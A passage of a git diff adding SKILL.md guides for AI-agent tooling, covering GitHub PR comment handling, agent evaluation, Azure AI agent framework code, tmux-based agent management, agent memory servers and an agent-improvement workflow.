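            # Exponential backoff with jitter: 1s, 2s, 4s, ... plus noise.
            sleep(base_delay * (2 ** attempt) + random.uniform(0, 0.5))
```

The `sleep` parameter is injectable so the helper can be unit-tested without real delays.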
+
+**Response Parsing**:
+- Response data may be nested under `data` or `data.data`
+- Parse defensively with fallback patterns
+- Contact search may return multiple results; match by email for accuracy
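A defensive extraction helper for the nested response shapes described above (field names are illustrative):

```python
# Hedged sketch: unwrap a tool response whose payload may sit under
# "data" or "data.data", then match a contact by email (case-insensitive).
def extract_contacts(response: dict) -> list:
    payload = response.get("data", response)
    if isinstance(payload, dict) and "data" in payload:
        payload = payload["data"]
    contacts = payload.get("contacts", []) if isinstance(payload, dict) else payload
    return contacts if isinstance(contacts, list) else []

def match_by_email(response: dict, email: str):
    for contact in extract_contacts(response):
        if contact.get("email", "").lower() == email.lower():
            return contact
    return None
```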
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| Find contact | ACTIVE_CAMPAIGN_FIND_CONTACT | email, id, phone |
+| Create contact | ACTIVE_CAMPAIGN_CREATE_CONTACT | email, first_name, last_name, tags |
+| Add/remove tags | ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG | action, tags, contact_email |
+| Subscribe/unsubscribe | ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION | action, list_id, email |
+| Add to automation | ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION | contact_email, automation_id |
+| Create task | ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK | relid, duedate, dealTasktype, title |
diff --git a/web-app/public/skills/address-github-comments/SKILL.md b/web-app/public/skills/address-github-comments/SKILL.md
new file mode 100644
index 00000000..424fab73
--- /dev/null
+++ b/web-app/public/skills/address-github-comments/SKILL.md
@@ -0,0 +1,55 @@
+---
+name: address-github-comments
+description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
+---
+
+# Address GitHub Comments
+
+## Overview
+
+Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
+
+## Prerequisites
+
+Ensure `gh` is authenticated.
+
+```bash
+gh auth status
+```
+
+If not logged in, run `gh auth login`.
+
+## Workflow
+
+### 1. Inspect Comments
+
+Fetch the comments for the current branch's PR.
+
+```bash
+gh pr view --comments
+```
+
+Or list individual review-thread comments directly: `gh api repos/{owner}/{repo}/pulls/{number}/comments`.
+
+### 2. Categorize and Plan
+
+- List the comments and review threads.
+- Propose a fix for each.
+- **Wait for user confirmation** on which comments to address first if there are many.
+
+### 3. Apply Fixes
+
+Apply the code changes for the selected comments.
+
+### 4. Respond to Comments
+
+Once fixed, reply to the feedback and resolve the threads. Note that `gh pr comment` posts a top-level PR comment; replying to a specific review thread requires the REST API via `gh api`.
+
+```bash
+gh pr comment --body "Addressed in latest commit."
+```
+
+## Common Mistakes
+
+- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
+- **Not verifying auth**: Check `gh auth status` before starting.
diff --git a/web-app/public/skills/agent-evaluation/SKILL.md b/web-app/public/skills/agent-evaluation/SKILL.md
new file mode 100644
index 00000000..964c6184
--- /dev/null
+++ b/web-app/public/skills/agent-evaluation/SKILL.md
@@ -0,0 +1,64 @@
+---
+name: agent-evaluation
+description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Evaluation
+
+You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
+production. You've learned that evaluating LLM agents is fundamentally different from
+testing traditional software—the same input can produce different outputs, and "correct"
+often has no single answer.
+
+You've built evaluation frameworks that catch issues before production: behavioral regression
+tests, capability assessments, and reliability metrics. You understand that the goal isn't
+a 100% test pass rate; it's catching real regressions before users hit them.
+
+## Capabilities
+
+- agent-testing
+- benchmark-design
+- capability-assessment
+- reliability-metrics
+- regression-testing
+
+## Requirements
+
+- testing-fundamentals
+- llm-fundamentals
+
+## Patterns
+
+### Statistical Test Evaluation
+
+Run tests multiple times and analyze result distributions
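+
+A minimal sketch of this pattern, where `run_agent` and `check` are stand-ins for your agent under test and a task-specific grader:
+
+```python
+def evaluate_statistically(run_agent, prompt, check, n_runs=10, min_pass_rate=0.8):
+    """Run the same test n_runs times and judge the pass rate, not a single run."""
+    passes = [bool(check(run_agent(prompt))) for _ in range(n_runs)]
+    pass_rate = sum(passes) / n_runs
+    return {"pass_rate": pass_rate, "passed": pass_rate >= min_pass_rate}
+
+# Deterministic stand-in "agent" so the example is self-contained:
+result = evaluate_statistically(
+    run_agent=lambda p: p.upper(),
+    prompt="hello world",
+    check=lambda out: "HELLO" in out,
+)
+```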
+
+### Behavioral Contract Testing
+
+Define and test agent behavioral invariants
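+
+One way to sketch this: express each invariant as a predicate and report violations (the contracts below are illustrative):
+
+```python
+def check_contracts(response, contracts):
+    """Return the names of behavioral contracts the response violates."""
+    return [name for name, holds in contracts.items() if not holds(response)]
+
+# Illustrative contracts for a hypothetical support agent:
+contracts = {
+    "non_empty": lambda r: len(r.strip()) > 0,
+    "no_internal_ids": lambda r: "EMP_" not in r,
+    "ends_with_period": lambda r: r.rstrip().endswith("."),
+}
+
+violations = check_contracts("Your refund was processed.", contracts)
+```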
+
+### Adversarial Testing
+
+Actively try to break agent behavior
+
+## Anti-Patterns
+
+### ❌ Single-Run Testing
+
+### ❌ Only Happy Path Tests
+
+### ❌ Output String Matching
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Agent scores well on benchmarks but fails in production | high | Bridge benchmark and production evaluation |
+| Same test passes sometimes, fails other times | high | Handle flaky tests in LLM agent evaluation |
+| Agent optimized for metric, not actual task | medium | Multi-dimensional evaluation to prevent gaming |
+| Test data accidentally used in training or prompts | critical | Prevent data leakage in agent evaluation |
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
diff --git a/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
new file mode 100644
index 00000000..74da0813
--- /dev/null
+++ b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
@@ -0,0 +1,333 @@
+---
+name: agent-framework-azure-ai-py
+description: Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code interpreter, file search, web search), integrating MCP servers, managing conversation threads, or implementing streaming responses. Covers function tools, structured outputs, and multi-tool agents.
+package: agent-framework-azure-ai
+---
+
+# Agent Framework Azure Hosted Agents
+
+Build persistent agents on Azure AI Foundry using the Microsoft Agent Framework Python SDK.
+
+## Architecture
+
+```
+User Query → AzureAIAgentsProvider → Azure AI Agent Service (Persistent)
+ ↓
+ Agent.run() / Agent.run_stream()
+ ↓
+ Tools: Functions | Hosted (Code/Search/Web) | MCP
+ ↓
+ AgentThread (conversation persistence)
+```
+
+## Installation
+
+```bash
+# Full framework (recommended)
+pip install agent-framework --pre
+
+# Or Azure-specific package only
+pip install agent-framework-azure-ai --pre
+```
+
+## Environment Variables
+
+```bash
+export AZURE_AI_PROJECT_ENDPOINT="https://<resource-name>.services.ai.azure.com/api/projects/<project-name>"
+export AZURE_AI_MODEL_DEPLOYMENT_NAME="gpt-4o-mini"
+export BING_CONNECTION_ID="your-bing-connection-id" # For web search
+```
+
+## Authentication
+
+```python
+from azure.identity.aio import AzureCliCredential, DefaultAzureCredential
+
+# Development
+credential = AzureCliCredential()
+
+# Production
+credential = DefaultAzureCredential()
+```
+
+## Core Workflow
+
+### Basic Agent
+
+```python
+import asyncio
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="MyAgent",
+ instructions="You are a helpful assistant.",
+ )
+
+ result = await agent.run("Hello!")
+ print(result.text)
+
+asyncio.run(main())
+```
+
+### Agent with Function Tools
+
+```python
+from typing import Annotated
+from pydantic import Field
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+def get_weather(
+ location: Annotated[str, Field(description="City name to get weather for")],
+) -> str:
+ """Get the current weather for a location."""
+ return f"Weather in {location}: 72°F, sunny"
+
+def get_current_time() -> str:
+ """Get the current UTC time."""
+ from datetime import datetime, timezone
+ return datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="WeatherAgent",
+ instructions="You help with weather and time queries.",
+ tools=[get_weather, get_current_time], # Pass functions directly
+ )
+
+ result = await agent.run("What's the weather in Seattle?")
+ print(result.text)
+```
+
+### Agent with Hosted Tools
+
+```python
+from agent_framework import (
+ HostedCodeInterpreterTool,
+ HostedFileSearchTool,
+ HostedWebSearchTool,
+)
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="MultiToolAgent",
+ instructions="You can execute code, search files, and search the web.",
+ tools=[
+ HostedCodeInterpreterTool(),
+ HostedWebSearchTool(name="Bing"),
+ ],
+ )
+
+ result = await agent.run("Calculate the factorial of 20 in Python")
+ print(result.text)
+```
+
+### Streaming Responses
+
+```python
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="StreamingAgent",
+ instructions="You are a helpful assistant.",
+ )
+
+ print("Agent: ", end="", flush=True)
+ async for chunk in agent.run_stream("Tell me a short story"):
+ if chunk.text:
+ print(chunk.text, end="", flush=True)
+ print()
+```
+
+### Conversation Threads
+
+```python
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="ChatAgent",
+ instructions="You are a helpful assistant.",
+ tools=[get_weather],
+ )
+
+ # Create thread for conversation persistence
+ thread = agent.get_new_thread()
+
+ # First turn
+ result1 = await agent.run("What's the weather in Seattle?", thread=thread)
+ print(f"Agent: {result1.text}")
+
+ # Second turn - context is maintained
+ result2 = await agent.run("What about Portland?", thread=thread)
+ print(f"Agent: {result2.text}")
+
+ # Save thread ID for later resumption
+ print(f"Conversation ID: {thread.conversation_id}")
+```
+
+### Structured Outputs
+
+```python
+from pydantic import BaseModel, ConfigDict
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+class WeatherResponse(BaseModel):
+ model_config = ConfigDict(extra="forbid")
+
+ location: str
+ temperature: float
+ unit: str
+ conditions: str
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="StructuredAgent",
+ instructions="Provide weather information in structured format.",
+ response_format=WeatherResponse,
+ )
+
+ result = await agent.run("Weather in Seattle?")
+ weather = WeatherResponse.model_validate_json(result.text)
+ print(f"{weather.location}: {weather.temperature}°{weather.unit}")
+```
+
+## Provider Methods
+
+| Method | Description |
+|--------|-------------|
+| `create_agent()` | Create new agent on Azure AI service |
+| `get_agent(agent_id)` | Retrieve existing agent by ID |
+| `as_agent(sdk_agent)` | Wrap SDK Agent object (no HTTP call) |
+
+## Hosted Tools Quick Reference
+
+| Tool | Import | Purpose |
+|------|--------|---------|
+| `HostedCodeInterpreterTool` | `from agent_framework import HostedCodeInterpreterTool` | Execute Python code |
+| `HostedFileSearchTool` | `from agent_framework import HostedFileSearchTool` | Search vector stores |
+| `HostedWebSearchTool` | `from agent_framework import HostedWebSearchTool` | Bing web search |
+| `HostedMCPTool` | `from agent_framework import HostedMCPTool` | Service-managed MCP |
+| `MCPStreamableHTTPTool` | `from agent_framework import MCPStreamableHTTPTool` | Client-managed MCP |
+
+## Complete Example
+
+```python
+import asyncio
+from typing import Annotated
+from pydantic import BaseModel, Field
+from agent_framework import (
+ HostedCodeInterpreterTool,
+ HostedWebSearchTool,
+ MCPStreamableHTTPTool,
+)
+from agent_framework.azure import AzureAIAgentsProvider
+from azure.identity.aio import AzureCliCredential
+
+
+def get_weather(
+ location: Annotated[str, Field(description="City name")],
+) -> str:
+ """Get weather for a location."""
+ return f"Weather in {location}: 72°F, sunny"
+
+
+class AnalysisResult(BaseModel):
+ summary: str
+ key_findings: list[str]
+ confidence: float
+
+
+async def main():
+ async with (
+ AzureCliCredential() as credential,
+ MCPStreamableHTTPTool(
+ name="Docs MCP",
+ url="https://learn.microsoft.com/api/mcp",
+ ) as mcp_tool,
+ AzureAIAgentsProvider(credential=credential) as provider,
+ ):
+ agent = await provider.create_agent(
+ name="ResearchAssistant",
+ instructions="You are a research assistant with multiple capabilities.",
+ tools=[
+ get_weather,
+ HostedCodeInterpreterTool(),
+ HostedWebSearchTool(name="Bing"),
+ mcp_tool,
+ ],
+ )
+
+ thread = agent.get_new_thread()
+
+ # Non-streaming
+ result = await agent.run(
+ "Search for Python best practices and summarize",
+ thread=thread,
+ )
+ print(f"Response: {result.text}")
+
+ # Streaming
+ print("\nStreaming: ", end="")
+ async for chunk in agent.run_stream("Continue with examples", thread=thread):
+ if chunk.text:
+ print(chunk.text, end="", flush=True)
+ print()
+
+ # Structured output
+ result = await agent.run(
+ "Analyze findings",
+ thread=thread,
+ response_format=AnalysisResult,
+ )
+ analysis = AnalysisResult.model_validate_json(result.text)
+ print(f"\nConfidence: {analysis.confidence}")
+
+
+if __name__ == "__main__":
+ asyncio.run(main())
+```
+
+## Conventions
+
+- Always use async context managers: `async with provider:`
+- Pass functions directly to `tools=` parameter (auto-converted to AIFunction)
+- Use `Annotated[type, Field(description=...)]` for function parameters
+- Use `get_new_thread()` for multi-turn conversations
+- Prefer `HostedMCPTool` for service-managed MCP, `MCPStreamableHTTPTool` for client-managed
+
+## Reference Files
+
+- [references/tools.md](references/tools.md): Detailed hosted tool patterns
+- [references/mcp.md](references/mcp.md): MCP integration (hosted + local)
+- [references/threads.md](references/threads.md): Thread and conversation management
+- [references/advanced.md](references/advanced.md): OpenAPI, citations, structured outputs
diff --git a/web-app/public/skills/agent-manager-skill/SKILL.md b/web-app/public/skills/agent-manager-skill/SKILL.md
new file mode 100644
index 00000000..2660641f
--- /dev/null
+++ b/web-app/public/skills/agent-manager-skill/SKILL.md
@@ -0,0 +1,40 @@
+---
+name: agent-manager-skill
+description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
+---
+
+# Agent Manager Skill
+
+## When to use
+
+Use this skill when you need to:
+
+- run multiple local CLI agents in parallel (separate tmux sessions)
+- start/stop agents and tail their logs
+- assign tasks to agents and monitor output
+- schedule recurring agent work (cron)
+
+## Prerequisites
+
+Install `agent-manager-skill` in your workspace:
+
+```bash
+git clone https://github.com/fractalmind-ai/agent-manager-skill.git
+```
+
+## Common commands
+
+```bash
+python3 agent-manager/scripts/main.py doctor
+python3 agent-manager/scripts/main.py list
+python3 agent-manager/scripts/main.py start EMP_0001
+python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
+python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
+Follow teams/fractalmind-ai-maintenance.md Workflow
+EOF
+```
+
+## Notes
+
+- Requires `tmux` and `python3`.
+- Agents are configured under an `agents/` directory (see the repo for examples).
diff --git a/web-app/public/skills/agent-memory-mcp/SKILL.md b/web-app/public/skills/agent-memory-mcp/SKILL.md
new file mode 100644
index 00000000..45d96513
--- /dev/null
+++ b/web-app/public/skills/agent-memory-mcp/SKILL.md
@@ -0,0 +1,82 @@
+---
+name: agent-memory-mcp
+author: Amit Rathiesh
+description: A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions).
+---
+
+# Agent Memory Skill
+
+This skill provides a persistent, searchable memory bank that automatically syncs with project documentation. It runs as an MCP server to allow reading/writing/searching of long-term memories.
+
+## Prerequisites
+
+- Node.js (v18+)
+
+## Setup
+
+1. **Clone the Repository**:
+ Clone the `agentMemory` project into your agent's workspace or a parallel directory:
+
+ ```bash
+ git clone https://github.com/webzler/agentMemory.git .agent/skills/agent-memory
+ ```
+
+2. **Install Dependencies**:
+
+ ```bash
+ cd .agent/skills/agent-memory
+ npm install
+ npm run compile
+ ```
+
+3. **Start the MCP Server**:
+ Use the helper script to activate the memory bank for your current project:
+
+ ```bash
+ npm run start-server
+ ```
+
+ _Example for current directory:_
+
+ ```bash
+ npm run start-server my-project $(pwd)
+ ```
+
+## Capabilities (MCP Tools)
+
+### `memory_search`
+
+Search for memories by query, type, or tags.
+
+- **Args**: `query` (string), `type?` (string), `tags?` (string[])
+- **Usage**: "Find all authentication patterns" -> `memory_search({ query: "authentication", type: "pattern" })`
+
+### `memory_write`
+
+Record new knowledge or decisions.
+
+- **Args**: `key` (string), `type` (string), `content` (string), `tags?` (string[])
+- **Usage**: "Save this architecture decision" -> `memory_write({ key: "auth-v1", type: "decision", content: "..." })`
+
+### `memory_read`
+
+Retrieve specific memory content by key.
+
+- **Args**: `key` (string)
+- **Usage**: "Get the auth design" -> `memory_read({ key: "auth-v1" })`
+
+### `memory_stats`
+
+View analytics on memory usage.
+
+- **Usage**: "Show memory statistics" -> `memory_stats({})`
+
+## Dashboard
+
+This skill includes a standalone dashboard to visualize memory usage.
+
+```bash
+npm run start-dashboard
+```
+
+Access at: `http://localhost:3333`
diff --git a/web-app/public/skills/agent-memory-systems/SKILL.md b/web-app/public/skills/agent-memory-systems/SKILL.md
new file mode 100644
index 00000000..ee791180
--- /dev/null
+++ b/web-app/public/skills/agent-memory-systems/SKILL.md
@@ -0,0 +1,67 @@
+---
+name: agent-memory-systems
+description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragmented."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Memory Systems
+
+You are a cognitive architect who understands that memory makes agents intelligent.
+You've built memory systems for agents handling millions of interactions. You know
+that the hard part isn't storing - it's retrieving the right memory at the right time.
+
+Your core insight: Memory failures look like intelligence failures. When an agent
+"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
+not a storage problem. You obsess over chunking strategies, embedding quality,
+and retrieval strategies.
+
+## Capabilities
+
+- agent-memory
+- long-term-memory
+- short-term-memory
+- working-memory
+- episodic-memory
+- semantic-memory
+- procedural-memory
+- memory-retrieval
+- memory-formation
+- memory-decay
+
+## Patterns
+
+### Memory Type Architecture
+
+Choosing the right memory type for different information
+
+### Vector Store Selection Pattern
+
+Choosing the right vector database for your use case
+
+### Chunking Strategy Pattern
+
+Breaking documents into retrievable chunks
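+
+As a concrete starting point, a fixed-size chunker with overlap (the sizes here are illustrative; always test them against retrieval quality):
+
+```python
+def chunk_text(text, chunk_size=200, overlap=50):
+    """Split text into overlapping chunks so boundary context isn't lost."""
+    if overlap >= chunk_size:
+        raise ValueError("overlap must be smaller than chunk_size")
+    step = chunk_size - overlap
+    return [text[i:i + chunk_size] for i in range(0, len(text), step)]
+
+chunks = chunk_text("x" * 500)
+```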
+
+## Anti-Patterns
+
+### ❌ Store Everything Forever
+
+### ❌ Chunk Without Testing Retrieval
+
+### ❌ Single Memory Type for All Data
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Chunks lose meaning without surrounding context | critical | Contextual chunking (Anthropic's approach) |
+| Chunk size chosen without validation | high | Test different chunk sizes against retrieval quality |
+| Retrieval returns irrelevant memories | high | Always filter by metadata first |
+| Old memories outrank recent, relevant ones | high | Add temporal scoring |
+| Contradictory memories coexist silently | medium | Detect conflicts on storage |
+| Memories overflow the context window | medium | Budget tokens for different memory types |
+| Embeddings from different models get mixed | medium | Track embedding model in metadata |
+
+## Related Skills
+
+Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
diff --git a/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
new file mode 100644
index 00000000..74f211bb
--- /dev/null
+++ b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
@@ -0,0 +1,349 @@
+---
+name: agent-orchestration-improve-agent
+description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
+---
+
+# Agent Performance Optimization Workflow
+
+Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.
+
+[Extended thinking: Agent optimization requires a data-driven approach combining performance metrics, user feedback analysis, and advanced prompt engineering techniques. Success depends on systematic evaluation, targeted improvements, and rigorous testing with rollback capabilities for production safety.]
+
+## Use this skill when
+
+- Improving an existing agent's performance or reliability
+- Analyzing failure modes, prompt quality, or tool usage
+- Running structured A/B tests or evaluation suites
+- Designing iterative optimization workflows for agents
+
+## Do not use this skill when
+
+- You are building a brand-new agent from scratch
+- There are no metrics, feedback, or test cases available
+- The task is unrelated to agent performance or prompt quality
+
+## Instructions
+
+1. Establish baseline metrics and collect representative examples.
+2. Identify failure modes and prioritize high-impact fixes.
+3. Apply prompt and workflow improvements with measurable goals.
+4. Validate with tests and roll out changes in controlled stages.
+
+## Safety
+
+- Avoid deploying prompt changes without regression testing.
+- Roll back quickly if quality or safety metrics regress.
+
+## Phase 1: Performance Analysis and Baseline Metrics
+
+Comprehensive analysis of agent performance using context-manager for historical data collection.
+
+### 1.1 Gather Performance Data
+
+```
+Use: context-manager
+Command: analyze-agent-performance $ARGUMENTS --days 30
+```
+
+Collect metrics including:
+
+- Task completion rate (successful vs failed tasks)
+- Response accuracy and factual correctness
+- Tool usage efficiency (correct tools, call frequency)
+- Average response time and token consumption
+- User satisfaction indicators (corrections, retries)
+- Hallucination incidents and error patterns
+
+### 1.2 User Feedback Pattern Analysis
+
+Identify recurring patterns in user interactions:
+
+- **Correction patterns**: Where users consistently modify outputs
+- **Clarification requests**: Common areas of ambiguity
+- **Task abandonment**: Points where users give up
+- **Follow-up questions**: Indicators of incomplete responses
+- **Positive feedback**: Successful patterns to preserve
+
+### 1.3 Failure Mode Classification
+
+Categorize failures by root cause:
+
+- **Instruction misunderstanding**: Role or task confusion
+- **Output format errors**: Structure or formatting issues
+- **Context loss**: Long conversation degradation
+- **Tool misuse**: Incorrect or inefficient tool selection
+- **Constraint violations**: Safety or business rule breaches
+- **Edge case handling**: Unusual input scenarios
+
+### 1.4 Baseline Performance Report
+
+Generate quantitative baseline metrics:
+
+```
+Performance Baseline:
+- Task Success Rate: [X%]
+- Average Corrections per Task: [Y]
+- Tool Call Efficiency: [Z%]
+- User Satisfaction Score: [1-10]
+- Average Response Latency: [Xms]
+- Token Efficiency Ratio: [X:Y]
+```
+
+## Phase 2: Prompt Engineering Improvements
+
+Apply advanced prompt optimization techniques using prompt-engineer agent.
+
+### 2.1 Chain-of-Thought Enhancement
+
+Implement structured reasoning patterns:
+
+```
+Use: prompt-engineer
+Technique: chain-of-thought-optimization
+```
+
+- Add explicit reasoning steps: "Let's approach this step-by-step..."
+- Include self-verification checkpoints: "Before proceeding, verify that..."
+- Implement recursive decomposition for complex tasks
+- Add reasoning trace visibility for debugging
+
+### 2.2 Few-Shot Example Optimization
+
+Curate high-quality examples from successful interactions:
+
+- **Select diverse examples** covering common use cases
+- **Include edge cases** that previously failed
+- **Show both positive and negative examples** with explanations
+- **Order examples** from simple to complex
+- **Annotate examples** with key decision points
+
+Example structure:
+
+```
+Good Example:
+Input: [User request]
+Reasoning: [Step-by-step thought process]
+Output: [Successful response]
+Why this works: [Key success factors]
+
+Bad Example:
+Input: [Similar request]
+Output: [Failed response]
+Why this fails: [Specific issues]
+Correct approach: [Fixed version]
+```
+
+### 2.3 Role Definition Refinement
+
+Strengthen agent identity and capabilities:
+
+- **Core purpose**: Clear, single-sentence mission
+- **Expertise domains**: Specific knowledge areas
+- **Behavioral traits**: Personality and interaction style
+- **Tool proficiency**: Available tools and when to use them
+- **Constraints**: What the agent should NOT do
+- **Success criteria**: How to measure task completion
+
+### 2.4 Constitutional AI Integration
+
+Implement self-correction mechanisms:
+
+```
+Constitutional Principles:
+1. Verify factual accuracy before responding
+2. Self-check for potential biases or harmful content
+3. Validate output format matches requirements
+4. Ensure response completeness
+5. Maintain consistency with previous responses
+```
+
+Add critique-and-revise loops:
+
+- Initial response generation
+- Self-critique against principles
+- Automatic revision if issues detected
+- Final validation before output
+
+### 2.5 Output Format Tuning
+
+Optimize response structure:
+
+- **Structured templates** for common tasks
+- **Dynamic formatting** based on complexity
+- **Progressive disclosure** for detailed information
+- **Markdown optimization** for readability
+- **Code block formatting** with syntax highlighting
+- **Table and list generation** for data presentation
+
+## Phase 3: Testing and Validation
+
+Comprehensive testing framework with A/B comparison.
+
+### 3.1 Test Suite Development
+
+Create representative test scenarios:
+
+```
+Test Categories:
+1. Golden path scenarios (common successful cases)
+2. Previously failed tasks (regression testing)
+3. Edge cases and corner scenarios
+4. Stress tests (complex, multi-step tasks)
+5. Adversarial inputs (potential breaking points)
+6. Cross-domain tasks (combining capabilities)
+```
+
+### 3.2 A/B Testing Framework
+
+Compare original vs improved agent:
+
+```
+Use: parallel-test-runner
+Config:
+ - Agent A: Original version
+ - Agent B: Improved version
+ - Test set: 100 representative tasks
+ - Metrics: Success rate, speed, token usage
+ - Evaluation: Blind human review + automated scoring
+```
+
+Statistical significance testing:
+
+- Minimum sample size: 100 tasks per variant
+- Confidence level: 95% (p < 0.05)
+- Effect size calculation (Cohen's d)
+- Power analysis for future tests
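+
+The significance check above can be sketched with a standard two-proportion z-test using only the standard library (the success counts are illustrative):
+
+```python
+from math import sqrt, erf
+
+def two_proportion_z_test(successes_a, n_a, successes_b, n_b):
+    """Two-sided z-test comparing the success rates of agent variants A and B."""
+    p_a, p_b = successes_a / n_a, successes_b / n_b
+    p_pool = (successes_a + successes_b) / (n_a + n_b)
+    se = sqrt(p_pool * (1 - p_pool) * (1 / n_a + 1 / n_b))
+    z = (p_b - p_a) / se
+    # Two-sided p-value from the standard normal CDF
+    p_value = 2 * (1 - 0.5 * (1 + erf(abs(z) / sqrt(2))))
+    return z, p_value
+
+z, p = two_proportion_z_test(70, 100, 85, 100)  # A: 70% vs B: 85% success
+significant = p < 0.05
+```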
+
+### 3.3 Evaluation Metrics
+
+Comprehensive scoring framework:
+
+**Task-Level Metrics:**
+
+- Completion rate (binary success/failure)
+- Correctness score (0-100% accuracy)
+- Efficiency score (steps taken vs optimal)
+- Tool usage appropriateness
+- Response relevance and completeness
+
+**Quality Metrics:**
+
+- Hallucination rate (factual errors per response)
+- Consistency score (alignment with previous responses)
+- Format compliance (matches specified structure)
+- Safety score (constraint adherence)
+- User satisfaction prediction
+
+**Performance Metrics:**
+
+- Response latency (time to first token)
+- Total generation time
+- Token consumption (input + output)
+- Cost per task (API usage fees)
+- Memory/context efficiency
+
+### 3.4 Human Evaluation Protocol
+
+Structured human review process:
+
+- Blind evaluation (evaluators don't know version)
+- Standardized rubric with clear criteria
+- Multiple evaluators per sample (inter-rater reliability)
+- Qualitative feedback collection
+- Preference ranking (A vs B comparison)
+
+## Phase 4: Version Control and Deployment
+
+Safe rollout with monitoring and rollback capabilities.
+
+### 4.1 Version Management
+
+Systematic versioning strategy:
+
+```
+Version Format: agent-name-v[MAJOR].[MINOR].[PATCH]
+Example: customer-support-v2.3.1
+
+MAJOR: Significant capability changes
+MINOR: Prompt improvements, new examples
+PATCH: Bug fixes, minor adjustments
+```
+
+Maintain version history:
+
+- Git-based prompt storage
+- Changelog with improvement details
+- Performance metrics per version
+- Rollback procedures documented
+
+### 4.2 Staged Rollout
+
+Progressive deployment strategy:
+
+1. **Alpha testing**: Internal team validation (5% traffic)
+2. **Beta testing**: Selected users (20% traffic)
+3. **Canary release**: Gradual increase (20% → 50% → 100%)
+4. **Full deployment**: After success criteria met
+5. **Monitoring period**: 7-day observation window
+
+### 4.3 Rollback Procedures
+
+Quick recovery mechanism:
+
+```
+Rollback Triggers:
+- Success rate drops >10% from baseline
+- Critical errors increase >5%
+- User complaints spike
+- Cost per task increases >20%
+- Safety violations detected
+
+Rollback Process:
+1. Detect issue via monitoring
+2. Alert team immediately
+3. Switch to previous stable version
+4. Analyze root cause
+5. Fix and re-test before retry
+```
+
+### 4.4 Continuous Monitoring
+
+Real-time performance tracking:
+
+- Dashboard with key metrics
+- Anomaly detection alerts
+- User feedback collection
+- Automated regression testing
+- Weekly performance reports
+
+## Success Criteria
+
+Agent improvement is successful when:
+
+- Task success rate improves by ≥15%
+- User corrections decrease by ≥25%
+- No increase in safety violations
+- Response time remains within 10% of baseline
+- Cost per task doesn't increase >5%
+- Positive user feedback increases
+
+## Post-Deployment Review
+
+After 30 days of production use:
+
+1. Analyze accumulated performance data
+2. Compare against baseline and targets
+3. Identify new improvement opportunities
+4. Document lessons learned
+5. Plan next optimization cycle
+
+## Continuous Improvement Cycle
+
+Establish regular improvement cadence:
+
+- **Weekly**: Monitor metrics and collect feedback
+- **Monthly**: Analyze patterns and plan improvements
+- **Quarterly**: Major version updates with new capabilities
+- **Annually**: Strategic review and architecture updates
+
